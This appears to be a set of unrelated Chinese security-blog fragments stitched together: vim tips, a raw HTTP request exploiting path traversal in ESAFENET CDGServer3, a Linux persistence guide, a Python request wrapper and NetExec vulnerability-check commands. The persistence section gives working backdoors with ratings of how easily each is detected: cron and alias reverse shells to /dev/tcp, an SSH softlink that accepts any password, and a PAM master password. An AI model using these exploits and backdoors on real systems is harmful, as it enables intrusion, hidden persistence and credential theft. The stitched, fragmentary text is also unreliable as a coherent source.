最近需要在Linux上修改Quan
的一些数据,下载到本地修改不是很方便,就想直接在服务器端修改,需要用到vim
的相关操作。 1.设置行号 一般快速操作都需要用到行号,所以一般都会用到这个命令set number
2.光标移动到指定行 这个需要按下ESC
来退出命令行模式,不然会无效。接着输入143G
其中143
就是行号,这里的意思是:将光标移动到143行 3.删除行 这个有两种操作,一个是配合上面的2
,也是在normal
模式下,直接输入dd
就删除了当前行,亦或者是命令模式
下,输入:3,5d
就会删除第3~5行的内容 目前就常用这几个,以快速操作数据。
POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/test.jsp HTTP/1.1
Host: xxxx
Cookie: JSESSIONID=E13D850E18BD224E56ABE1DC1D4FD13D
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 5
hello
一直以来,可能更专注于Windows
下的权限维持,对于Linux下的权限维持,则是非常不关注。 因此,聚焦于这款工具,看上去很牛逼 1.存在check.py
,可以告知你可以使用
哪些维权方式 2.维权的主程序,它可以帮助你自动维权。 以下是官方的介绍节选OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用 发现程度:|| PAM后门,PAM是一个Linux登录验证的认证服务,修改其中关于ssh登录的验证,添加一个万能密码,已经记录的账号密码位置(类似把对方房间内有内鬼) 发现程度:|| SSH软链接 cat /etc/ssh/sshd_config|grep UsePAM ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888 ssh root@xx.xx.xx.xx -p 8888 任意密码登录即可 发现程度:|||||| 公私钥 使用密钥进行登录 发现程度:|||||| 后门帐号 使用命令添加账号 发现程度:|||||| crontab后计划任务 1、编辑后门反弹 vim /etc/.111.sh #!/bin/bash sh -i >& /dev/tcp/192.168.86.137/3434 0>&1 chmod +x /etc/.111.sh 2、添加定时任务 vim /etc/crontab */1 * * * * root /etc/.1111.sh 发现程度:|||||| Strace后门 strace是一个动态跟踪工具,它可以跟踪系统调用的执行。 我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围 可以记录ssh明文和密钥(登录的)和Rootkit配合一起 发现程度:|||| 命令自定义-Alias后门 alias命令的功能:为命令设置别名 alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.86.137/3333 0>&1; };alerts' 执行ls就会反弹shell 持久化+隐藏:重启依旧生效 发现程度:|||| Rootkit后门 https://github.com/f0rb1dd3n/Reptile/releases/ Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 发现程度:|| 但是使用工具进行检测出来情况很大,建议看代码,手动编写此工具(难度很大) history不记录执行命令 在输入命令时候,添加空格 ssh软链接&crontab 快速生成软链接[需要运行脚本成功后,一分钟连接],并且执行计划任务,每分钟判断当前软链接是否存在,如果被kill掉,就重新执行 ||||| 越多,越容易发发现 || 越少,越难发现,但是部署起来,需要的依赖很多
感觉这样写起来贼方便,突然就明白了二次封装
的好处了from SimpleRequestFramework import SimpleRequestFramework custom_headers = { "User-Agent": "CustomUserAgent/1.0", "Authorization": "Bearer YOUR_TOKEN" } # new a framework instance, and set the save directory, use proxy, proxy type, proxy address, and custom headers framework = SimpleRequestFramework( save_directory="output_files", use_proxy=True, proxy_type="http", proxy_address="http://127.0.0.1:8080", headers=custom_headers ) # GET request example get_url = "https://api.ip.sb/ip" params = { "param1": "value1", "param2": "value2" } framework.fetch_and_save(get_url, "output_get.json", method="GET", params=params) # POST request example post_url = "https://httpbin.org/post" data = { "data1": "value1", "data2": "value2" } framework.fetch_and_save(post_url, "output_post.json", method="POST", data=data)
下载地址 官方文档 粗略看了一下,它支持漏洞扫描
,尽管只有三个 ZerologonNetExec smb <ip> -u '' -p '' -M zerologo
PetitPotamNetExec smb <ip> -u '' -p '' -M petitpotam
noPACNetExec smb <ip> -u 'user' -p 'pass' -M nopac
其余的感觉跟cme差不多